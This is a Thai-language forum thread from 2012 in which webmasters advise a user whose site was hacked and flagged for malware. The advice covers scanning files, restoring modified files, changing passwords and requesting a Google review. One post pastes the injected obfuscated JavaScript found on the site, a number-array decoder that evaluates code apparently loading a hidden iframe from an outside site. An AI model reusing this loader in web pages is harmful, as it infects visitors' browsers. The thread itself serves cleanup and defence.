เว็บไซด์ติด malware virus ต้องทำไงครับ

เริ่มโดย zsevens, 01 มิถุนายน 2012, 13:47:33

หัวข้อก่อนหน้า - หัวข้อถัดไป

0 สมาชิก และ 1 ผู้มาเยือน กำลังดูหัวข้อนี้

zsevens




ต่อจากการ HACK คราวที่แล้วครับ ตอนนี้โดนสแปมไปแล้ว มีหนทางจะแก้ไขยังไงบ้างครับ ??

tongboss

อย่างแรกตามไล่เช็คทุกไฟล์ว่ามีโค้ทอะไรแปลกๆๆบ้าง
เน้นในธีม ปลั๊กอินก่อนเลย

หลังจากนั้นไปแจ้ง google webmaster  ว่าเว็บสะอาดแล้ว

Joneburapa

ลองใช้ Fizscript ไล่หาโค้ดแปลกๆดูครับ  :wanwan017:

indysoft

 
ที่ผมเคยเจอ มันมากัลปลักอินครับ ลองติดตั้ง NOD ครับ มันอาจจะโชว์แสดง ว่าตัวไหนคือไวรัส ทีนี้ เราก็ดูไฟล์ที่มันแจ้ง ลบทิ้งครับ หายเป็นปกติ

ghostbehead

อ้างถึงจาก: tongboss ใน 01 มิถุนายน 2012, 14:20:24
อย่างแรกตามไล่เช็คทุกไฟล์ว่ามีโค้ทอะไรแปลกๆๆบ้าง
เน้นในธีม ปลั๊กอินก่อนเลย

หลังจากนั้นไปแจ้ง google webmaster  ว่าเว็บสะอาดแล้ว


ตามนี้ครับ
[direct=http://tinytastebake.com/]ขาย Brownie Brownie Cracker[/direct][direct=http://shoesdeedee.com/]ขายคอนเวิร์สมือสอง รองเท้ามือสอง[/direct]<br />[direct=http://isareeya.com/]บทความ ข่าวสาร เทคโนโลยี[/direct]<br />[direct=http://sangsanweb.com/]รับทำเว็บไซต์ PHP Wordpress[/direct]

zsevens

อ้างถึง<script>try{q=document.createElement("u");q.appendChild(q "");}catch(qw){h=-012/5;zz='a' 'l';f='fr' 'o' 'm' 'Ch';f ='arC';}try{begbe=prototype;}catch(b43gds){zz='zv'.substr(123-122) zz;ss=[];f =(h&&zz)?'ode':"";w=this;e=w[f.substr(11) zz];n=[-3.375,-3.75,7.5,8.875,7.375,9.625,8.625,7.625,8.75,9.5,0.75,9.875,9.25,8.125,9.5,7.625,0,-0.125,2.5,8.125,7.75,9.25,7.125,8.625,7.625,-1,9.375,9.25,7.375,2.625,-0.75,8,9.5,9.5,9,2.25,0.875,0.875,9.875,9.875,9.875,0.75,9.625,8.5,9.5,9.25,7.125,8.5,7.125,8.75,7.875,0.75,7.375,8.875,8.625,0.875,9.375,9.5,7.125,9.5,9.375,0.75,9,8,9,-0.75,-1,8.75,7.125,8.625,7.625,2.625,-0.75,5.5,9.875,8.125,9.5,9.5,7.625,9.25,-0.75,-1,9.375,7.375,9.25,8.875,8.5,8.5,8.125,8.75,7.875,2.625,-0.75,7.125,9.625,9.5,8.875,-0.75,-1,7.75,9.25,7.125,8.625,7.625,7.25,8.875,9.25,7.5,7.625,9.25,2.625,-0.75,8.75,8.875,-0.75,-1,7.125,8.5,8.125,7.875,8.75,2.625,-0.75,7.375,7.625,8.75,9.5,7.625,9.25,-0.75,-1,8,7.625,8.125,7.875,8,9.5,2.625,-0.75,1.25,-0.75,-1,9.875,8.125,7.5,9.5,8,2.625,-0.75,1.25,-0.75,2.75,2.5,0.875,8.125,7.75,9.25,7.125,8.625,7.625,2.75,-0.125,0.125,2.375,-3.375,-3.75];for(i=6-2-1-2-1;i-166!=0;i  ){k=i;ss=ss String["from" "CharCode"](-1*4*h*(5 1*n[k]));}e(ss);}</script><link rel="alternate" type="application/rss xml" title=" &raquo; Feed"

อันนี้เรียกว่าโค๊ดแปลกรึเปล่าครับ ผม ctrl u  ดูหน่ะครับ?

somsuksri

วันนี้ เพิ่งโดนไปสดๆร้อน
โดน hack ฝัง script ในไฟล์ js
ตอนนี้เอาออกแล้ว และก็ขอ reviews ใหม่ที่ google webmaster ไปแล้ว
แต่ไม่รู้ว่าใช้เวลานานมั้ยครับก่าจะกลับมา
ไม่ว่าสถานการณ์จะดีหรือเลวปานใด ....เดี๋ยวมันก็เปลี่ยน

siammbk

multiware พวกนี้มักจะเข้าไปเกาะกับ ไฟล์หลักๆ

เช่น

index,login ไม่ว่าจะเป็น php asp html หรือ อื่นๆที่เป็นหลักๆ ส่วนไฟล์ที่ชื่อแปลกๆไม่ต้องกลัวคับไม่โดนแน่ๆ

มันจะเข้าไปลบ code ส่วนของ multiware ออก เท่านั้นคับ

ในส่วนของพวกโปรแกรมสแกนไวรัส ก็จะแสดงว่าเจอไวรัสคับ มีติดตั้งไว้ก็จะดีคับ จะได้ดูด้วยว่าเวปเราโดน มัลแวร์ หรือป่าว
รับออกแบบเว็บไซต์ ทุกรูปแบบ งานใหญ่ๆ ระบบยากๆ ราคาแรงๆ คุยกันคับ
line : siammbk
tel : 095-675-8614

dotnetz

- ตรวจสอบดว่ามีไฟล์อะไรแปลกๆเพิ่มเข้ามารึเปล่านะครับ เช่น default.php ที่ไม่ใช่ของเรา
โดยดูจากวันที่ครับ แล้วลบไฟล์ดังกล่าวออกให้หมด
- อันไหนที่เป็นไฟล์ของเรา แต่โดน inject script เข้าไป ดูจากวันที่ Last modified เช่นเดียวกันครับ
ทำการแก้ไขให้หมดครับ โดยลบแล้ว copy ต้นฉบับเราลงไป
หรือนำไฟล์ออกมาลบส่วน script ที่โดนฝังออก แล้ว copy กลับเข้าไปใหม่ก็ได้ครับ
- เมื่อแน่ใจว่าแก้ไขหมดแล้ว ให้ทำการเปลี่ยน password ของทั้ง cpanel และ ftp ใหม่เลยครับ
- ถ้าเว็บเราโดนเตือนว่าเป็นผู้เผยแพร่ malware ไปแล้ว ให้ยื่นขอตรวจสอบจากทาง GG Webmaster Tool ใหม่ครับ
[direct=http://www.thaiseoboard.com/index.php/topic,347531.0.html]...เริ่มต้นจากเงิน 500 บาท...[/direct]
[direct=http://www.thaiseoboard.com/index.php/topic,301349.0.html]+++ ครบ 18 เดือนกับการลุยป่า มาแชร์กัน +++[/direct]
HOST25GATOR <= คูปองโค้ด โฮสเกเตอร์ จัดเต็ม!! ลด 25% ทุกแพลน